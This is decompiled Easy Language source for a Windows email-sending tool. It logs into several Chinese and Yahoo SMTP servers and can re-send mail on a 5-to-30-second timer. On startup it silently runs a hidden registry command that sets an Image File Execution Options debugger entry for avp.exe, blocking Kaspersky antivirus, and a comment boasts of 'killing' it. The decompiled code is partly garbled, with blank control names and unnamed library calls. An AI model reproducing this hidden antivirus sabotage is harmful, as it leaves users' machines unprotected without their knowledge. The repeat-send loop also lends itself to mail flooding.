 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：本源码来自易语言资源网(www.wodesoft.com)
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：             易语言资源网注意事项
--============   www.wodesoft.com  =============--
* 易语言资源网为易语言官方站、易语言官方论坛提供辅助资源站；本易语言资源网( www.wodesoft.com)所有软件和资料均为软件作者提供和网友推荐发布而来，其版权归该软件和程序源码的合法拥有者所有，本站易语言资源网整理收集仅供易语言用户学习和易语言技术研究探讨使用，不得用于任何商业用途。如果由于以上原因造成的版权纠纷本站概不负责！
* 本站资源未经许可,任何网站不得非法盗链及抄袭本站资源；如引用，请注明来自易语言资源网，谢谢合作！
--============   www.wodesoft.com  =============--
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 469
    高度 = 435
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 5
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\BdMKmdM1.e\_启动窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “邮件发送工具beat1.0   07年编写+09年美化(早年版本)”
    帮助文件名 = “”



.常量 PASS, "“reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /v debugger /t reg_sz /d debugfile.exe /f ”", , PASS KAV


 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 5 0 系统核心支持库
 ' internet 707ca37322474f6ca841f0e224f4b620 2 0 互联网支持库
 ' eAPI F7FC1AE45C5C4758AF03EF19F18A395D 3 0 应用接口支持库





.窗口程序集 窗口程序集1, , , 

.子程序 __启动窗口_创建完毕, 空白型, , 
.局部变量 PASSKAV, 文本型, , , 

 ' --========  易语言资源网  (www.wodesoft.com)  ======--
 ' 努力创建完善、持续更新的易语言学习例程源码资源站
 ' --================   www.wodesoft.com  ===========--
 ' --==================   易语言资源网注意事项  ================--
 ' * 易语言资源网为易语言官方站、易语言官方论坛提供辅助资源站；
 ' 本易语言资源网( www.wodesoft.com)所有软件和资料均为软件作者提
 ' 供和网友推荐发布而来，其版权归该软件和程序源码的合法拥有者所
 ' 有，本站易语言资源网整理收集仅供易语言用户学习和易语言技术研
 ' 究探讨使用，不得用于任何商业用途。如果由于以上原因造成的版权
 ' 纠纷本站概不负责！
 ' * 本站资源未经许可，任何网站不得非法盗链及抄袭本站资源；如引用
 ' 页面，请注明来自易语言资源网，谢谢合作！
 ' --=====================   www.wodesoft.com  ================--

赋值 (PASSKAV, #PASS) ' 因为鄙视卡巴，所以干掉卡巴
运行 (PASSKAV, 假, #隐藏窗口)

.子程序 _登陆邮箱按钮_被单击, 空白型, , 
.局部变量 qq, 文本型, , , 
.局部变量 yel, 文本型, , , 
.局部变量 yls, 文本型, , , 
.局部变量 esy, 文本型, , , 
.局部变量 yahoo, 文本型, , , 
.局部变量 登录信息, 文本型, , , 
.局部变量 登录信息2, 文本型, , , 
.局部变量 登录信息3, 文本型, , , 

赋值 (登录信息, “登陆成功了,嘿嘿......”)
赋值 (登录信息2, “恭喜你,登陆失败了....”)
赋值 (登录信息3, “日,耍我吗....”)
.判断开始 (或者 (等于 (.内容, “”), 等于 (.内容, “”), 等于 (.内容, “”)))
    信息框 (登录信息3, #错误图标, )
.默认
    
.判断结束
.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”), 等于 (.内容, “@qq.com”)))
    赋值 (qq, “smtp.qq.com”)
.默认
    .如果 (等于 (未知支持库函数_0 (qq, 25, .内容, .内容, ), 真))
        赋值 (.禁止, 真)
        信息框 (登录信息, #信息图标, )
    .否则
        信息框 (登录信息2, #警告图标, )
    .如果结束
     ' 本源码来自易语言资源网(www.wodesoft.com)
.判断结束
.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”), 等于 (.内容, “@126.com”)))
    赋值 (yel, “smtp.126.com”)
.默认
    .如果 (等于 (未知支持库函数_0 (yel, 25, .内容, .内容, ), 真))
        赋值 (.禁止, 真)
        信息框 (登录信息, #信息图标, )
    .否则
        信息框 (登录信息2, #警告图标, )
    .如果结束
    
.判断结束
.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”), 等于 (.内容, “@163.com”)))
    赋值 (yls, “smtp.163.com”)
.默认
    .如果 (等于 (未知支持库函数_0 (yls, 25, .内容, .内容, ), 真))
        赋值 (.禁止, 真)
        信息框 (登录信息, #信息图标, )
    .否则
        信息框 (登录信息2, #警告图标, )
    .如果结束
    
.判断结束
.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”), 等于 (.内容, “@21cn.com”)))
    赋值 (esy, “smtp.21cn.com”)
.默认
    .如果 (等于 (未知支持库函数_0 (esy, 25, .内容, .内容, ), 真))
        赋值 (.禁止, 真)
        信息框 (登录信息, #信息图标, )
    .否则
        信息框 (登录信息2, #警告图标, )
    .如果结束
    
.判断结束
.判断开始 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”), 等于 (.内容, “@yahoo.com”)))
    赋值 (yahoo, “smtp.yahoo.com”)
.默认
    .如果 (等于 (未知支持库函数_0 (yahoo, 25, .内容, .内容, ), 真))
        赋值 (.禁止, 真)
        信息框 (登录信息, #信息图标, )
    .否则
        信息框 (登录信息2, #警告图标, )
    .如果结束
     ' 本源码来自易语言资源网(www.wodesoft.com)
.判断结束
赋值 (.禁止, 真)

.子程序 _更改登陆邮箱按钮_被单击, 空白型, , 
.如果真 (等于 (.禁止, 真))
    赋值 (.禁止, 假)
    赋值 (.内容, “”)
    赋值 (.内容, “”)
    赋值 (.内容, “@qq.com”)
.如果真结束


.子程序 _发送按钮_被单击, 空白型, , 
.局部变量 ts, 文本型, , , 
.局部变量 ts1, 文本型, , , 
.局部变量 ts2, 文本型, , , 

赋值 (ts, “为何那么喜欢耍人...”)
赋值 (ts1, “发送成功”)
赋值 (ts2, “发送失败”)
.判断开始 (或者 (等于 (.内容, “”), 等于 (.内容, “”), 等于 (.内容, “”)))
    信息框 (ts, #错误图标, )
.默认
     ' 本源码来自易语言资源网(www.wodesoft.com)
.判断结束
.如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
    信息框 (ts1, 0, )
    赋值 (.禁止, 真)
    返回 ()
.如果真结束
信息框 (ts2, 0, )

.子程序 _时钟1_周期事件, 空白型, , 
.局部变量 ts, 文本型, , , 

.判断开始 (等于 (.内容, “5s/次”))
    赋值 (.时钟周期, 5000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
    
.判断结束
.判断开始 (等于 (.内容, “10s/次”))
    赋值 (.时钟周期, 10000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
    
.判断结束
.判断开始 (等于 (.内容, “15s/次”))
    赋值 (.时钟周期, 15000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
    
.判断结束
.判断开始 (等于 (.内容, “20s/次”))
    赋值 (.时钟周期, 20000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
    
.判断结束
.判断开始 (等于 (.内容, “25s/次”))
    赋值 (.时钟周期, 25000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
     ' 本源码来自易语言资源网(www.wodesoft.com)
.判断结束
.判断开始 (等于 (.内容, “30s/次”))
    赋值 (.时钟周期, 30000)
.默认
    .如果真 (等于 (未知支持库函数_5 (.内容, .内容, .内容, , , 相加 (.内容, .内容), ), “”))
        赋值 (.禁止, 真)
        返回 ()
    .如果真结束
    
.判断结束
赋值 (ts, 相加 (“你没有设置循环发送邮件”, #换行符, “邮件将会只发送一次”))
信息框 (ts, #信息图标, )

.子程序 _发送按钮1_被单击, 空白型, , 
.局部变量 ts, 文本型, , , 

赋值 (ts, “程序已暂停....”)
赋值 (.禁止, 假)
暂停 ()
信息框 (ts, 0, )

.子程序 _发送按钮2_被单击, 空白型, , 
.局部变量 ts, 文本型, , , 

赋值 (ts, 相加 (“请在帐号登陆一栏里面先设置登陆的帐号密码和邮箱类型”, #换行符, “还有阁下的邮箱的SMTP服务必须打开的”, #换行符, “不然收不到信在下也无能为力”, #换行符, “内容和主题还有收件人那些就不应该我来教你怎么写了吧”, #换行符, “时间间隔设置如果你不设置的话”, #换行符, “邮件只能发一遍,不能循环发送”, #换行符, “如有bug，欢迎指正”, #换行符, “by:'Ay  Q:80161577”, #换行符, “Http://Hi.baidu.Com/Ey_basiC”))
.如果 (等于 (信息框 (ts, 相加 (#信息图标, #是否钮), “是否进入我的QQ空间”), #是钮))
    未知支持库函数_56 (“http://user.qzone.qq.com/80161577”)
.否则
    返回 ()
.如果结束
' 本源码来自易语言资源网(www.wodesoft.com)

.子程序 _发送按钮3_被单击, 空白型, , 
.局部变量 ts, 文本型, , , 

赋值 (ts, “是不是按错按钮了....”)
.如果 (等于 (信息框 (ts, 相加 (#信息图标, #是否钮), “关闭提示：”), #是钮))
    未知支持库函数_56 (“http://qq80161577.ys168.com”)
    结束 ()
.否则
    返回 ()
.如果结束
结束 ()


 ' 不属于任何一个程序集、类模块的函数：
